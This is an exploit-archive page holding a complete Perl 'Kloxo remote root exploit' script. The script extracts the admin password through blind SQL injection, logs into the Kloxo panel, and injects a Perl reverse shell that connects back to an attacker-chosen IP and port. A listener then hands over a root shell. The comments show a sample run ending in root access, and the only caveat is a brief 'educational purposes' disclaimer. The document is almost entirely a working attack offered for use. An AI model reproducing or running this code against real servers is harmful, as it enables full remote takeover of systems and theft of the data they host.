Home / exploits Kloxo Remote Root Exploit
Posted on 02 March 2014
#!/usr/bin/perl # # Title: Kloxo remote root exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Coded: 28 January 2014 # Published: 26 February 2014 # MorXploit Research # http://www.MorXploit.com # # Download: # http://www.morxploit.com/morxploits/morxkloxo.pl # # Requires LWP::UserAgent # apt-get install libwww-perl # yum install libwww-perl # perl -MCPAN -e 'install Bundle::LWP' # For SSL support: # apt-get install liblwp-protocol-https-perl # yum install perl-Crypt-SSLeay # # Tested on CentOS 5.8 and 5.9 # Should work on CentOS/RHEL 5.x # # Author disclaimer: # The information contained in this entire document is for educational, demonstration and testing purposes only. # Author cannot be held responsible for any malicious use. Use at your own risk. # # perl morxkloxo.pl http://******.com:7778 **.**.**.** 31337 # # =================================================== # --- Kloxo remote root exploit # --- By: Simo Ben youssef <simo_at_morxploit_com> # --- MorXploit Research www.MorXploit.com # =================================================== # [*] MorXploiting http://******.com:7778 # [*] It might take a little while, so sit your ass down and relax # [+] Base64 pwd: bW9yeHBsb2l0 # [+] Got admin password: morxploit # [*] Logging in ... # [+] Successfully logged in! # [*] Trying to get server info # [+] Done! # [*] Trying to inject connect back shell # [+] Looks good, now waiting for root shell # [+] Et voila you are in! # # Linux ******.com 2.6.18-308.8.2.el5.028stab101.1PAE #1 SMP Sun Jun 24 21:40:20 MSD 2012 i686 i686 i386 GNU/Linux # uid=0(root) gid=0(root) use LWP::UserAgent; use IO::Socket; use strict; use MIME::Base64; sub banner { system('clear'); print "=================================================== "; print "--- Kloxo remote root exploit "; print "--- By: Simo Ben youssef <simo_at_morxploit_com> "; print "--- MorXploit Research www.MorXploit.com "; print "=================================================== "; } if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) { banner(); print "perl $0 <target> <connectbackIP> <connectbackport> <verbose> "; print "perl $0 http://localhost:7778 127.0.0.1 31337 "; exit; } my $host = $ARGV[0]; my $cbhost = $ARGV[1]; my $cbport = $ARGV[2]; my $v = $ARGV[3]; my $pos = "8"; my $start = "48"; my $ends = "122"; my $password; my $char; my $cookie; my $decoded; my $class; my $lhost; $| = 1; $SIG{CHLD} = 'IGNORE'; my $l_sock = IO::Socket::INET->new( Proto => "tcp", LocalPort => "$cbport", Listen => 1, LocalAddr => "0.0.0.0", Reuse => 1, ) or die "[-] Could not listen on $cbport: $! "; my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); my $up = $ua->get("$host"); unless ($up->is_success) { print "[-] Error: " . $up->status_line . " "; exit; } banner(); print "[*] Verbose mode on! " if (defined $v); print "[*] MorXploiting $host "; print "[*] It might take a little while, so sit your ass down and relax "; my $check = "lbin/webcommand.php"; my $kloxo = $ua->get("$host/$check"); unless ($kloxo->decoded_content =~ /__error_only_clients_and_auxiliary_allowed_to_login/) { print "[-] Doesn't seem like $host is running kloxo "; exit; } while ($pos) { for(my $count=$start;$count<=$ends;$count++) { if (($count > 57) && ($count < 61) || ($count > 90) && ($count < 97)) { next; } my $query = "lbin/webcommand.php?login-class=client&login-name=a%27%20union%20select%20%27%241%24Tw5.g72.%24/0X4oceEHjGOgJB/fqRww/%27%20from%20client%20where%20ascii%28substring%28%28%20select%20realpass%20from%20client%20limit%201%29%2c$pos%2c1%29%29%3d$count%23&login-password=123456"; my $page = $ua->get("$host/$query"); print " [*] Trying char/position: $count/$pos" if (defined $v); if (($page->is_success) && ($page->decoded_content =~ /^s*$/)) { $char = chr($count); $password .= $char; print " " if (defined $v); print " [+] Base64 pwd: $password"; sleep (2) if (defined $v); last; } } my $passlength = length($password); my $charlength = ($pos - 7); if (($passlength < $charlength) && ($passlength != 0)) { $decoded = decode_base64($password); print " [+] Got admin password: $decoded "; last; } elsif ($passlength == 0) { print " [-] Failed, probably not vulnerable "; exit; } $pos++ } print "[*] Logging in ... "; my $kloxo = $ua->post("$host/htmllib/phplib/",[ "frm_clientname"=> "admin", "frm_password"=> "$decoded", "login" => "Login" ] ); if ($kloxo->as_string =~ /Set-Cookie: kloxo-session-id=(.*?);/) { print "[+] Successfully logged in! "; $cookie = $1; } else { print "[-] Couldn't log in "; exit; } print "[*] Trying to get server info "; my $getinfo = $ua->get("$host/display.php?frm_action=show", 'Cookie' => "kloxo-clientname=admin; kloxo-classname=client; kloxo-session-id=$cookie"); if ($getinfo->decoded_content =~ /commandcenter">(.*?)">/s) { my $pserver = $1; $pserver =~ /value ="(.*)/; $class = $1; } else { print "[-] Couldn't get info, trying default settings "; $class = "pserver"; } if ($getinfo->decoded_content =~ /name="frm_o_o[0][class]" value ="$class">(.*?)">/s) { my $nname = $1; $nname =~ /value ="(.*)/; $lhost = $1; } else { print "[-] Couldn't get info, trying default settings "; $lhost = "localhost"; } print "[+] Done! "; my $ua2 = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua2->timeout(10); print "[*] Trying to inject connect back shell "; my $inject = $ua2->post("$host/display.php", Content_Type => 'form-data', Cookie => "kloxo-clientname=admin; kloxo-classname=client; kloxo-session-id=$cookie", Content => [ 'frm_o_o[0][class]' => "$class", 'frm_o_o[0][nname]' => "$lhost", 'frm_pserver_c_ccenter_command' => "perl -MIO -e '$p=fork;exit,if($p); use Socket; use FileHandle; my $system = "/bin/sh"; my $host = "$cbhost"; my $port = "$cbport";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")); connect(SOCKET, sockaddr_in($port, inet_aton($host))); SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "[+] Et voila you are in!\n\n"; system("uname -a;id"); system($system);'", 'frm_action' => 'updateform', 'frm_subaction' => 'commandcenter', 'frm_change' => 'Execute', ], ); unless ($inject->as_string =~ /200 OK/) { print "[-] Something went wrong "; exit; } print "[+] Looks good, now waiting for root shell "; my $a_sock = $l_sock->accept(); $l_sock->shutdown(SHUT_RDWR); copy_data_bidi($a_sock); sub copy_data_bidi { my ($socket) = @_; my $child_pid = fork(); if (! $child_pid) { close(STDIN); copy_data_mono($socket, *STDOUT); $socket->shutdown(SHUT_RD); exit(); } else { close(STDOUT); copy_data_mono(*STDIN, $socket); $socket->shutdown(SHUT_WR); kill("TERM", $child_pid); } } sub copy_data_mono { my ($src, $dst) = @_; my $buf; while (my $read_len = sysread($src, $buf, 4096)) { my $write_len = $read_len; while ($write_len) { my $written_len = syswrite($dst, $buf); return unless $written_len; $write_len -= $written_len; } } }
